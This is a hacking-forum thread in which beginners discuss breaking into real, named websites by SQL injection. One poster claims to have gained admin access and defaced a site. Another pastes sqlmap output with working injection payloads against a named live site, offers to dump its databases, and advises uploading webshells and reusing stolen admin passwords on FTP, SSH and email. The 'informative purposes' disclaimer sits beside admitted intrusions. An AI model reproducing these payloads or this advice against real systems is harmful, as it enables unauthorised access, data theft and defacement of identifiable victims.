EvilZone
Hacking and Security => Beginner's Corner => : UnknownError June 12, 2015, 05:58:38 AM
-
Hello everyone.
Im new to all this hacking business and im stil learning as i go. So far im skilled enough to do all Basic missions on HackThisSite.org and couple of the Realistic mission and that is not enough for what im trying to do. Im experimanting with SQL injection and i manage to get in to the website but when it comes to make any changes i cant make them. I used the regular Adminlogin.asp and use the common injection (' OR '1'='1) to gain access as an admin. All i can do is browse to the admin menu and look at almost everything but when i want to input some data (my signature) i can't. i just get some type of SQL error but everyone else seems to be able to make changes and add sig to the site. What are they doing hat im not? is it another injection?
-
i would say use sqlmap just to dump the users/admin tables so you can get the admins password and try it to use it on ftp/ssh or w.e even his email, just a thought... but anyways what you should be looking for is somewhere you can upload a file into the website any form that lets you upload anything so you can upload a webshell.. even if its a picture uploader theres ways to get around that.. but yea try what i told you, google if you have to and let me know if you run into any problems ill try to help...
-
Thanks for the help. I got couple of things to google.
I'm sure you've heard of Havij, i found this while looking for tutorials on SQL injections and hacking tutorials. This program is the shit but i feel like im not learning anything. Right now i got access to 3 websites of witch only 1 i was able to add my mark (http://www.angelvestgroup.com/info.php?id=%Inject_Here%1 (http://www.angelvestgroup.com/info.php?id=%Inject_Here%1)) [/size][size=78%]and that was because i got the user/password tables and i got it from there. The other two, however, i get the tables but i cant get he info in them. I've been working on this for the past 5 days with different methods but im not that good. Im a super noob i guess but im learning quick and getting far. Check out the URLs and try your luck.[/size]
[/size]
[/size][size=78%]URLs:[/size]
[/size]
[/size]http://www.c-on-text.com/ShowTopic.aspx?TopicID=2&lang=en-us[size=78%]
[/size]http://www.danceparadise.com.br/radioshows.aspx?id=192&id_cat=3[size=78%]
-
Thanks for the help. I got couple of things to google.
I'm sure you've heard of Havij, i found this while looking for tutorials on SQL injections and hacking tutorials. This program is the shit but i feel like im not learning anything. Right now i got access to 3 websites of witch only 1 i was able to add my mark (http://www.angelvestgroup.com/info.php?id=%Inject_Here%1 (http://www.angelvestgroup.com/info.php?id=%Inject_Here%1)) [size=78%]and that was because i got the user/password tables and i got it from there. The other two, however, i get the tables but i cant get he info in them. I've been working on this for the past 5 days with different methods but im not that good. Im a super noob i guess but im learning quick and getting far. Check out the URLs and try your luck.[/size]
[size=78%]URLs:[/size]
http://www.c-on-text.com/ShowTopic.aspx?TopicID=2&lang=en-us (http://www.c-on-text.com/ShowTopic.aspx?TopicID=2&lang=en-us)
[/size]http://www.danceparadise.com.br/radioshows.aspx?id=192&id_cat=3 (http://www.danceparadise.com.br/radioshows.aspx?id=192&id_cat=3)
nah i actually never heard of havij, i use sqlmap for my sqlinjection needs... ill see if i can get anything with sqlmap and let you know... but look into sqlmap its top of the line sqli tool.. but if you really want to learn i would recommend reading everything you can about sqli and try doing it manually or run sqlmap through burpsuite to see whats going on...
-
for the danceparadise.... as i see in the picture you sent me they got a shitload of databases (137) to be exact... i cant pull anything from those tables and dump it since its so many kinds of sqli lol, but im running a search through them see if i find any user/pass stuff, since thats alot to go through manually...
search is gonna take a while since its so many tables, but ill PM you the dumps if you want when its done if i find anything...
sqlmap identified the following injection points with a total of 185 HTTP(s) requests:
---
Parameter: id_cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_cat=3' AND 2235=2235 AND 'Uqvm'='Uqvm
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id_cat=3' AND (SELECT 2241 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(2241=2241,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nYun'='nYun
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: id_cat=3';(SELECT * FROM (SELECT(SLEEP(5)))mlAW)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id_cat=3' AND (SELECT * FROM (SELECT(SLEEP(5)))yOWW) AND 'SQSG'='SQSG
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: MySQL 5.0
the other website dont seem to be vuln at least through sqlmap, maybe manually but i dont feel like going through all of that right now... were you able to get the tables like you did with danceparadise in hajiv for the other one? (c-on-text)
and what you mean by you added your mark in that other site ? wanna hear something funny i just noticed, i actually audited that site before and got their db dump too lol... like a few months back, never did anything with it though.. (angelvest one)
P.S this is all for informative purposes, im in no way damaging or defacing anything.. all for the LULZ.. lol
-
[size=0px]"P.S this is all for informative purposes, im in no way damaging or defacing anything.. all for the LULZ.. lol"[/size][/color]
[/size][/color]
[/size][size=0px]Same thing here! Im just learning about website vulnerabilities. [/size][size=0px]
[/size][size=0px] [/size][size=0px]
[/size][size=0px]For the looks of it you are really good a checking [/size][size=0px][/size][size=0px]vulnerabilities in websites.[/size]
[/size][size=0px]If you go to the site that i was successful in entering youll see what im talking about.[/size][size=0px]
[/size]
[/size]this is what i get when im trying to inject[size=78%]
-
yeah but you just copy and pasted what sqlmap used to see if it was vulnerable, thats all that does, if you want to select tables and stuff, you have to implement the SELECT * FROM ... WHERE ... , thats just an example dont type that lol... just go download and read some sqlmap tutorials, theres plenty on google and if you really want to learn the manual way just get burpsuite and have sqlmap run through it so you can get an idea of whats going on or just go read a bunch of sqlinection tutorials and do it through trial and error...
you can find everything i just told you on google...
GOOGLE!!
"sqlmap tutorials"
"run sqlmap through burpsuite"
"mysql sql injection tutorial"
check the forums tutorial page i bet theres a bunch of stuff on it there too,
im only gonna spoon feed you this time, so you better get to learning
-
Thank you, i appreciate the help and advice. It seems i got some learning to do. Time to hit Google for some research.